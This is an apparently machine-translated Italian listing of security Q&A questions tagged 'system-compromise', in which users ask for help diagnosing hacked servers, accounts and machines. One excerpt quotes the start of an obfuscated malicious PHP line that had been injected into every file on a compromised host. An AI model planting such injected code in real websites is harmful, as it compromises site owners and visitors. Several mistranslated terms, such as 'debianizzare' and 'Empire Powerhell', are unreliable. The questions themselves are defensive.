Domande con tag 'system-compromise'

1
risposta

Che cosa fa "oscrashed.xyz" su un computer?

Ho digitato male un URL in chrome e mi ha reindirizzato al sito: oscrashed.xyz Sembra essere il tipico sito di truffa che ti chiede di chiamare un numero per far sì che il tuo computer venga sbloccato o ripulito dai virus. Ma dopo un po ', il...
posta 10.08.2016 - 19:36
2
risposte

sfruttando setuid e setgid bit

Stavo leggendo materiale su codifica sicura e in molti punti si dice di non usare i bit setuid e setgid per l'escalation dei privilegi. Questi sono vulnerabili e possono portare a problemi di sicurezza. Invece dovremmo eseguire un processo di he...
posta 15.04.2015 - 01:43
2
risposte

Come affrontare il compromesso del database dell'applicazione

Recentemente ho trovato uno scenario in una valutazione sulla sicurezza IT. Sono nuovo in questo settore e la mia conoscenza è limitata, quindi non sono sicuro se la mia risposta allo scenario sia adatta o meno. Apprezzerà davvero se qualcuno po...
posta 26.08.2017 - 10:55
1
risposta

Hai bisogno di aiuto per debianizzare il PHP dannoso

Recentemente ho avuto un server di hosting condiviso che è stato violato; la seguente riga di codice è stata iniettata nella parte superiore di ogni file PHP sul server: <?php if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER...
posta 24.03.2015 - 03:57
1
risposta

SSH in uscita. Rintracciare il processo

Sono stato fermato dal mio ISP al lavoro per avere una macchina che creava dozzine di connessioni SSH in uscita. Ho rintracciato la macchina e l'ho tolta dalla rete. Il problema è che ci sono molte altre macchine con configurazioni identiche che...
posta 02.07.2018 - 13:04
1
risposta

I log di Port Knock suggeriscono che la macchina è stata compromessa?

Sulla mia macchina CentOS, tutte le mie porte sono filtrate con la regola Iptables: DROP all -- * * 0.0.0.0/0 0.0.0.0/0 Quindi da Internet, ogni timeout della porta. L'unico modo per ssh nella macchina, è di...
posta 08.07.2018 - 00:46
3
risposte

"Droplet" digitalocean presumibilmente compromesso per un sito Web banale e non pubblicizzato. Dovrei essere preoccupato per la mia macchina?

Ho ricevuto un messaggio da D.O. sulla mia Droplet che dice di averlo spento perché c'era un sacco di traffico in uscita che sembrava un attacco. Il sito che avevo su quel server non era molto conosciuto. Sarei sorpreso se 20 persone l'avessero...
posta 03.05.2014 - 23:16
0
risposte

L'ascoltatore impero è compromesso?

Da un po 'di tempo mi sto cazzando con il kit di strumenti di sfruttamento post-powers di Empire Powerhell. Ho "infettato" il mio PC di casa con un carico utile malevolo e sto cercando di ottenere persistenza / accesso amministrativo, ecc. Ho un...
posta 29.03.2017 - 20:32
2
risposte

Come sapere se un host è stato compromesso e re-protetto di nuovo? (caso particolare di un lampone) [duplicato]

Sto eseguendo un PI lampone e ho lasciato accidentalmente la porta 22 aperta da un IP pubblico per circa 24 ore. La distro raspberry di Raspberries viene fornita di default con una password "pi" e una password "raspberry" quindi temo che possa...
posta 27.12.2015 - 15:25
4
risposte

La mia e-mail è stata compromessa

Qualcuno ha sicuramente ottenuto l'accesso a due delle mie e-mail alternative. Lo so osservando l'attività di accesso. Guardando i registri delle e-mail ho scoperto che l'indirizzo IP che sta sempre entrando nella mia e-mail non è il mio. Non...
posta 15.01.2016 - 06:46